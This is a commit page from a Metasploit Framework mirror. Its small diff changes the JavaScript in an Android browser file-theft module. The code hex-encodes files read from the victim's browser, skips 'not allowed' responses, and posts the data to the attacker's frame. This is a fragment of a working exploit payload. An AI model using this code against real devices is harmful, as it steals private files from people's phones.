infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add 'not allowed' check instead of magic check.

bug/bundler_fix
joev 2015-03-06 00:01:31 -06:00
parent 7db3277731
commit 3fb4fbe8e6
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
modules/auxiliary/gather/android_browser_file_theft.rb
View File

@ -142,7 +142,8 @@ class Metasploit3 < Msf::Auxiliary
var c = d.toString(16);
return (c.length < 2) ? 0+c : c;
}).join(new String);
if (hex.length && hex.substring(0,8)==='53514c69') {
/*ensures there are no 'not allowed' responses that appear to be valid data*/
if (hex.length && hex.indexOf('3c68746d6c3e3c626f64793e6e6f7420616c6c6f7765643c2f626f64793e3c2f68746d6c3e') == '-1') {
top.postMessage({data:hex,url:location.href}, '*');
}
parent.postMessage(1,'*');